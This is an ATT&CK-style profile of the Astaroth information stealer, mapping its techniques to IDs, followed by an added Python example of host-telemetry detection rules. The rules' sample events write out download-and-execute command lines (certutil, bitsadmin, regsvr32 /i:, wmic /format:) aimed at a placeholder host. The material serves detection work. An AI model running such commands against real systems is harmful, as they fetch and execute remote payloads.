Astaroth is a Trojan and information stealer known to affect companies in Europe and Brazil. It has been known publicly since at least late 2017. [1] [2]

ID: S0373
Contributors: Carlos Borges, CIP

Platforms: Windows

Version: 1.0

Techniques Used

Domain | ID | Name | Use
Enterprise | T1115 | Clipboard Data | Astaroth collects information from the clipboard by using the OpenClipboard() and GetClipboardData() Windows API functions. [1]
Enterprise | T1059 | Command-Line Interface | Astaroth spawns a CMD process to execute commands. [1]
Enterprise | T1223 | Compiled HTML File | Astaroth uses ActiveX objects for file execution and manipulation. [2]
Enterprise | T1003 | Credential Dumping | Astaroth uses an external tool known as NetPass to recover passwords. [1]
Enterprise | T1132 | Data Encoding | Astaroth encodes data using Base64 before sending it to the C2 server. [2]
Enterprise | T1074 | Data Staged | Astaroth collects data in a plaintext file named r1.log before exfiltration. [2]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code. [1]
Enterprise | T1129 | Execution through Module Load | Astaroth uses the LoadLibraryExW() function to load additional modules. [1]
Enterprise | T1041 | Exfiltration Over Command and Control Channel | Astaroth exfiltrates the information collected in its r1.log file to the external C2 server. [1]
Enterprise | T1056 | Input Capture | Astaroth logs keystrokes from the victim's machine. [2]
Enterprise | T1027 | Obfuscated Files or Information | Astaroth obfuscates its JScript code. [1]
Enterprise | T1057 | Process Discovery | Astaroth searches for different processes on the system. [1]
Enterprise | T1093 | Process Hollowing | Astaroth searches for unins000.exe (GAS Tecnologia software), Syswow64\userinit.exe or System32\userinit.exe in order to evasively create a new process in a suspended state. [1]
Enterprise | T1060 | Registry Run Keys / Startup Folder | Astaroth creates a startup item for persistence. [2]
Enterprise | T1117 | Regsvr32 | Astaroth can be loaded through regsvr32.exe. [1]
Enterprise | T1105 | Remote File Copy | Astaroth uses certutil and BITSAdmin to download additional malware. [2] [1]
Enterprise | T1064 | Scripting | Astaroth uses JavaScript to perform its core functionalities. [2]
Enterprise | T1063 | Security Software Discovery | Astaroth checks for the presence of Avast antivirus in the C:\Program Files\ folder. [2]
Enterprise | T1023 | Shortcut Modification | Astaroth's initial payload is a malicious .LNK file. [2]
Enterprise | T1045 | Software Packing | Astaroth uses a software packer called Pe123\RPolyCryptor. [1]
Enterprise | T1082 | System Information Discovery | Astaroth collects the machine name and keyboard language from the system. [2] [1]
Enterprise | T1016 | System Network Configuration Discovery | Astaroth collects the external IP address from the system. [2]
Enterprise | T1124 | System Time Discovery | Astaroth collects the timestamp from the infected machine. [2]
Enterprise | T1047 | Windows Management Instrumentation | Astaroth uses WMIC to execute payloads. [2]
Enterprise | T1220 | XSL Script Processing | Astaroth executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain. [1]
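Several of the behaviours in the table (certutil/BITSAdmin downloads, regsvr32 loading from a remote location, WMIC with a remote XSL stylesheet, staging in r1.log) translate directly into host telemetry checks. The following is an added Python example, not code from the original page; the Sysmon-like events, host name stage.invalid and file names are constructed, and the rules are illustrative starting points rather than tuned detections.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-like sample telemetry (not from the page): process events
# carry image path and command line, file events the written path; names are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://stage.invalid/p.bin p.bin"},
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin.exe /transfer job /download http://stage.invalid/m.dll m.dll"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /i:http://stage.invalid/x.sct"},
    {"type": "process", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": 'wmic.exe os get /format:"http://stage.invalid/a.xsl"'},
    {"type": "file", "path": r"C:\Users\Public\r1.log"},
    # Benign look-alikes: local DLL registration and a file hash check.
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\lib.dll"},
    {"type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -hashfile setup.exe SHA256"},
]
URL = re.compile(r"https?://", re.IGNORECASE)

def _exe(event):
    """Lower-cased image file name, so directory and casing do not matter."""
    return PureWindowsPath(event.get("image", "")).name.lower()

def _proc(event, names):
    return event["type"] == "process" and _exe(event) in names

# One rule per behaviour from the table: (technique ID, predicate over one event).
RULES = [
    ("T1105", lambda e: _proc(e, {"certutil.exe", "bitsadmin.exe"}) and bool(URL.search(e["cmdline"]))),
    ("T1117", lambda e: _proc(e, {"regsvr32.exe"}) and bool(URL.search(e["cmdline"]))),
    ("T1220", lambda e: _proc(e, {"wmic.exe"}) and bool(re.search(r"/format:\S*https?://", e["cmdline"], re.I))),
    ("T1074", lambda e: e["type"] == "file" and PureWindowsPath(e["path"]).name.lower() == "r1.log"),
]

def match_event(event):
    """Return the technique IDs whose rule fires for a single event."""
    return [tid for tid, pred in RULES if pred(event)]

def scan(events):
    """Return (event index, technique IDs) for each event that triggered a rule."""
    return [(i, hits) for i, e in enumerate(events) if (hits := match_event(e))]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, hits)
```

The two benign events at the end of the sample fire no rule, which is the point of requiring a URL in the command line rather than matching on the binary name alone.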